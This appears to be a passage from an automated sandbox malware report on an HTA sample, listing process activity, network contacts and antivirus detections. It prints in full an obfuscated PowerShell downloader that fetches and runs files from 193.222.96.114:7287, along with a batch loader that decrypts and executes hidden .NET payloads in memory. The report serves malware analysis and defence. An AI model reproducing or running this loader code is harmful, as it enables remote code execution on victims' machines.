$RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function zyftbcnyzprd($phhdiofq, $hqvujry){[io.file]::writeallbytes($phhdiofq, $hqvujry)};function rsniejco($phhdiofq){if($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61328,61336,61336))) -eq $true){rundll32.exe $phhdiofq }elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61340,61343,61277))) -eq $true){powershell.exe -executionpolicy unrestricted -file $phhdiofq}elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61337,61343,61333))) -eq $true){misexec /qn /i $phhdiofq}else{start-process $phhdiofq}};function zwufidkkjd($wfmgmuntikbycrft){$ywqrhkjgiioxguh = new-object (yshqdzbwwyszrgig @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$hqvujry = $ywqrhkjgiioxguh.downloaddata($wfmgmuntikbycrft);return $hqvujry};function yshqdzbwwyszrgig($xgzdvkpmylyy){$yfbtdzpe=61228;$ouswlv=$null;foreach($fxegqmn in $xgzdvkpmylyy){$ouswlv+=[char]($fxegqmn-$yfbtdzpe)};return $ouswlv};function ddscnjijjrgim(){$lbhpkxrqsdodra = $env:appdata + '\';$rtgcecbbqyud = $lbhpkxrqsdodra + 'jiteon.xlsx';if(test-path -path $rtgcecbbqyud){invoke-item $rtgcecbbqyud;}else{ $hkunbcqspbbswbpnkbf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyftbcnyzprd $rtgcecbbqyud $hkunbcqspbbswbpnkbf;invoke-item $rtgcecbbqyud;};$gzgwwtbwpzop = $lbhpkxrqsdodra + 'gogi.bat'; if (test-path -path $gzgwwtbwpzop){rsniejco $gzgwwtbwpzop;}else{ $vgjdqkaf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyftbcnyzprd $gzgwwtbwpzop $vgjdqkaf;rsniejco $gzgwwtbwpzop;};;;;}ddscnjijjrgim;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function zyftbcnyzprd($phhdiofq, $hqvujry){[io.file]::writeallbytes($phhdiofq, $hqvujry)};function rsniejco($phhdiofq){if($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61328,61336,61336))) -eq $true){rundll32.exe $phhdiofq }elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61340,61343,61277))) -eq $true){powershell.exe -executionpolicy unrestricted -file $phhdiofq}elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61337,61343,61333))) -eq $true){misexec /qn /i $phhdiofq}else{start-process $phhdiofq}};function zwufidkkjd($wfmgmuntikbycrft){$ywqrhkjgiioxguh = new-object (yshqdzbwwyszrgig @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$hqvujry = $ywqrhkjgiioxguh.downloaddata($wfmgmuntikbycrft);return $hqvujry};function yshqdzbwwyszrgig($xgzdvkpmylyy){$yfbtdzpe=61228;$ouswlv=$null;foreach($fxegqmn in $xgzdvkpmylyy){$ouswlv+=[char]($fxegqmn-$yfbtdzpe)};return $ouswlv};function ddscnjijjrgim(){$lbhpkxrqsdodra = $env:appdata + '\';$rtgcecbbqyud = $lbhpkxrqsdodra + 'jiteon.xlsx';if(test-path -path $rtgcecbbqyud){invoke-item $rtgcecbbqyud;}else{ $hkunbcqspbbswbpnkbf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyftbcnyzprd $rtgcecbbqyud $hkunbcqspbbswbpnkbf;invoke-item $rtgcecbbqyud;};$gzgwwtbwpzop = $lbhpkxrqsdodra + 'gogi.bat'; if (test-path -path $gzgwwtbwpzop){rsniejco $gzgwwtbwpzop;}else{ $vgjdqkaf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyftbcnyzprd $gzgwwtbwpzop $vgjdqkaf;rsniejco $gzgwwtbwpzop;};;;;}ddscnjijjrgim;	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
13.107.246.41	part-0013.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
193.222.96.114	unknown	Germany		3303	SWISSCOMSwisscomSwitzerlandLtdCH	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.214.172	true
part-0013.t-0009.t-msedge.net	13.107.246.41	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://193.222.96.114:7287/jiteon.xlsx	false	15%, Virustotal, Browse	unknown
http://193.222.96.114:7287/GoGi.bat	false	12%, Virustotal, Browse	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hta.hta

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://193.222.96.114	Virustotal: Detection: 10%	Perma Link
Source: http://193.222.96.114:7287/jiteon.xlsx	Virustotal: Detection: 15%	Perma Link
Source: http://193.222.96.114:7287/GoGi.bat	Virustotal: Detection: 11%	Perma Link
Source: http://193.222.96.11	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for submitted file

Source: hta.hta	Virustotal: Detection: 39%			Perma Link
Source: hta.hta	ReversingLabs: Detection: 39%

Source: unknown	HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49755 version: TLS 1.2

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 7287
Source: unknown	Network traffic detected: HTTP traffic on port 7287 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7287
Source: unknown	Network traffic detected: HTTP traffic on port 7287 -> 49731

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 193.222.96.114:7287

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /jiteon.xlsx HTTP/1.1Host: 193.222.96.114:7287Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /GoGi.bat HTTP/1.1Host: 193.222.96.114:7287

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox View	IP Address: 13.107.246.41 13.107.246.41

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
